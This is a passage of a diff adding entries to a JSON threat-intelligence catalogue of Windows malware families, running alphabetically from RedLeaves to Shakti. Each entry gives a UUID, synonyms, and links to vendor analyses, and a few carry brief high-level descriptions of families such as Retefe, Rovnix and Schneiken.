+ "uuid": "a70e93a7-3578-47e1-9926-0818979ed866",
+ "value": "RedLeaves",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert",
+ "https://twitter.com/JaromirHorejsi/status/816237293073797121"
+ ]
+ },
+ "uuid": "cd5f5165-7bd3-4430-b0bc-2c8fa518f618",
+ "value": "Red Alert",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler",
+ "http://image.ahnlab.com/file_upload/asecissue_files/ASEC%20REPORT_vol.91.pdf"
+ ]
+ },
+ "uuid": "ca8ed7c0-f40b-4c0e-9dc4-52d6e0da41a7",
+ "value": "Red Gambler",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg",
+ "https://sensepost.com/discover/tools/reGeorg/",
+ "https://github.com/sensepost/reGeorg"
+ ]
+ },
+ "uuid": "9ee0eb87-7648-4581-b301-7472a48946ad",
+ "value": "reGeorg",
+ "description": ""
+ },
+ {
+ "meta": {
+ 
"synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.regin",
+ "https://www.youtube.com/watch?v=jeLd-gw2bWo"
+ ]
+ },
+ "uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb",
+ "value": "Regin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos",
+ "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/",
+ "http://malware-traffic-analysis.net/2017/12/22/index.html",
+ "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2",
+ "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/",
+ "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/",
+ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/",
+ "https://secrary.com/ReversingMalware/RemcosRAT/"
+ ]
+ },
+ "uuid": "2894aee2-e0ec-417a-811e-74a68ab967b2",
+ "value": "Remcos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf",
+ "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions"
+ ]
+ },
+ "uuid": "d39486af-c056-4bbf-aa1d-86fb5ef90ada",
+ "value": "Remexi",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remsec_strider",
+ "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Symantec_Remsec_IOCs.pdf"
+ ]
+ },
+ "uuid": "6a3c3fbc-97ec-4938-b64e-2679e4b73db9",
+ "value": "Remsec",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ 
"refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy"
+ ]
+ },
+ "uuid": "b2b93651-cf64-47f5-a54f-799b919c592c",
+ "value": "Remy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom",
+ "https://www.coresecurity.com/sites/default/files/resources/2017/03/Behind_Malware_Infection_Chain.pdf"
+ ]
+ },
+ "uuid": "a1f137d4-298f-4761-935d-bd39ab898479",
+ "value": "Rerdom",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retadup",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/"
+ ]
+ },
+ "uuid": "42fa55e3-e708-4c11-b807-f31573639941",
+ "value": "Retadup",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Tsukuba",
+ "Werdlod"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe",
+ "https://www.govcert.admin.ch/blog/33/the-retefe-saga",
+ "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/",
+ "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/",
+ "https://github.com/cocaman/retefe"
+ ]
+ },
+ "uuid": "22ef1e56-7778-41d1-9b2b-737aa5bf9777",
+ "value": "Retefe",
+ "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. 
 The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic."
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Revetrat"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat",
+ "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/",
+ "https://isc.sans.edu/diary/rss/22590",
+ "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/"
+ ]
+ },
+ "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f",
+ "value": "Revenge RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
+ ]
+ },
+ "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
+ "value": "RGDoor",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu",
+ "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
+ ]
+ },
+ "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043",
+ "value": "Rikamanu",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux"
+ ]
+ },
+ "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a",
+ "value": "Rincux",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/"
+ ]
+ },
+ "uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
+ "value": "Ripper ATM",
+ "description": ""
+ }, 
+ {
+ "meta": {
+ "synonyms": [
+ "yellowalbatross"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock",
+ "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf"
+ ]
+ },
+ "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192",
+ "value": "rock",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader",
+ "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware"
+ ]
+ },
+ "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e",
+ "value": "Rockloader",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin"
+ ]
+ },
+ "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf",
+ "value": "Rofin",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku"
+ ]
+ },
+ "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c",
+ "value": "Rokku",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat",
+ "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
+ "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
+ "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/",
+ "https://www.youtube.com/watch?v=uoBQE5s2ba4"
+ ]
+ },
+ "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5",
+ "value": "RokRAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "CarbonGrabber"
+ ],
+ "type": [],
+ "refs": [
+ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik",
+ "http://blogs.cisco.com/security/talos/rombertik"
+ ]
+ },
+ "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1",
+ "value": "Rombertik",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos"
+ ]
+ },
+ "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a",
+ "value": "Romeo(Alfa,Bravo, ...)",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs"
+ ]
+ },
+ "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9",
+ "value": "Roopirs",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam",
+ "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/"
+ ]
+ },
+ "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b",
+ "value": "Roseam",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover",
+ "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/"
+ ]
+ },
+ "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050",
+ "value": "Rover",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Mayachok",
+ "Cidox",
+ "BkLoader"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix",
+ "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
+ "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
+ "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
+ "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
+ "https://blogs.technet.microsoft.com/mmpc/2013/07/25/the-evolution-of-rovnix-private-tcpip-stacks/",
+ 
"https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/",
+ "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
+ "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf",
+ "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html"
+ ]
+ },
+ "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f",
+ "value": "Rovnix",
+ "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://github.com/nccgroup/Royal_APT"
+ ]
+ },
+ "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72",
+ "value": "RoyalCli",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://github.com/nccgroup/Royal_APT"
+ ]
+ },
+ "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a",
+ "value": "Royal DNS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena",
+ "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena"
+ ]
+ },
+ "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766",
+ "value": "Rozena",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm",
+ 
"https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ ]
+ },
+ "uuid": "e6952b4d-e96d-4641-a88f-60074776d553",
+ "value": "RTM",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos",
+ "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered"
+ ]
+ },
+ "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b",
+ "value": "rtpos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv",
+ "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear"
+ ]
+ },
+ "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2",
+ "value": "Ruckguv",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish"
+ ]
+ },
+ "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70",
+ "value": "Rumish",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat",
+ "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ ]
+ },
+ "uuid": "b746a645-5974-44db-a811-a024214b7fba",
+ "value": "running_rat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "RCSU"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar",
+ "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction"
+ ]
+ },
+ "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4",
+ "value": "Rurktar",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock",
+ "https://www.secureworks.com/blog/research-21041",
+ 
"http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html",
+ "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
+ "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html",
+ "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/",
+ "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf",
+ "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf",
+ "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/"
+ ]
+ },
+ "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d",
+ "value": "Rustock",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Saga"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom",
+ "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
+ "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
+ "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/",
+ "http://malware-traffic-analysis.net/2017/10/13/index.html"
+ ]
+ },
+ "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431",
+ "value": "SAGE",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Sakurel"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1",
+ "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
+ "https://www.secureworks.com/research/sakula-malware-family"
+ ]
+ },
+ "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b",
+ "value": "Sakula RAT",
+ "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files 
onto the compromised computer."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf"
+ ]
+ },
+ "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e",
+ "value": "Salgorea",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
+ ]
+ },
+ "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a",
+ "value": "Sality",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam",
+ "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
+ "https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
+ "http://blog.talosintel.com/2016/03/samsam-ransomware.html",
+ "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html",
+ "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/"
+ ]
+ },
+ "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a",
+ "value": "SamSam",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Daws"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny",
+ "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html"
+ ]
+ },
+ "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9",
+ "value": "Sanny",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Hussarini"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust",
+ "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a",
+ 
"https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html"
+ ]
+ },
+ "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e",
+ "value": "Sarhust",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan",
+ "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread",
+ "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/",
+ "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html"
+ ]
+ },
+ "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91",
+ "value": "Satan Ransomware",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana",
+ "https://www.cylance.com/threat-spotlight-satan-raas"
+ ]
+ },
+ "uuid": "09b555be-8bac-44b2-8741-922ee0b87880",
+ "value": "Satana",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot",
+ "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/"
+ ]
+ },
+ "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369",
+ "value": "Sathurbot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos",
+ "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
+ "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos"
+ ]
+ },
+ "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf",
+ "value": "ScanPOS",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken",
+ 
"https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb",
+ "https://github.com/vithakur/schneiken"
+ ]
+ },
+ "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d",
+ "value": "Schneiken",
+ "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/"
+ ]
+ },
+ "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e",
+ "value": "Scote",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker",
+ "https://twitter.com/struppigel/status/791535679905927168"
+ ]
+ },
+ "uuid": "9803b201-28e5-40c5-b661-c1a191388072",
+ "value": "ScreenLocker",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+ ]
+ },
+ "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207",
+ "value": "SeaDaddy",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt",
+ "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
+ ]
+ },
+ "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c",
+ "value": "SeaSalt",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll",
+ 
"https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
+ ]
+ },
+ "uuid": "272268bb-2715-476b-a121-49142581c559",
+ "value": "SeDll",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "azzy",
+ "eviltoss"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf",
+ "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/",
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf"
+ ]
+ },
+ "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75",
+ "value": "Sedreco",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "jhuhugit",
+ "jkeyskw",
+ "downrage",
+ "carberplike"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
+ "https://labsblog.f-secure.com/2015/09/08/sofacy-recycles-carberp-and-metasploit-code/",
+ "http://www.welivesecurity.com/2015/07/10/sednit-apt-group-meets-hacking-team/",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/",
+ "https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/",
+ "https://blog.xpnsec.com/apt28-hospitality-malware-part-2/",
+ 
"https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", + "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", + "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + ] + }, + "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", + "value": "Seduploader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" + ] + }, + "uuid": "503ca41c-7788-477c-869b-ac530f20c490", + "value": "SendSafe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" + ] + }, + "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", + "value": "Serpico", + "description": "" + }, + { + "meta": { + "synonyms": [ + "XShellGhost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", + "https://securelist.com/shadowpad-in-corporate-networks/81432/", + "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", + "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" + ] + }, + "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", + "value": "ShadowPad", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" + ] + }, + "uuid": "f64683c8-50ab-42c0-8b90-881598906528", + "value": "Shakti", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
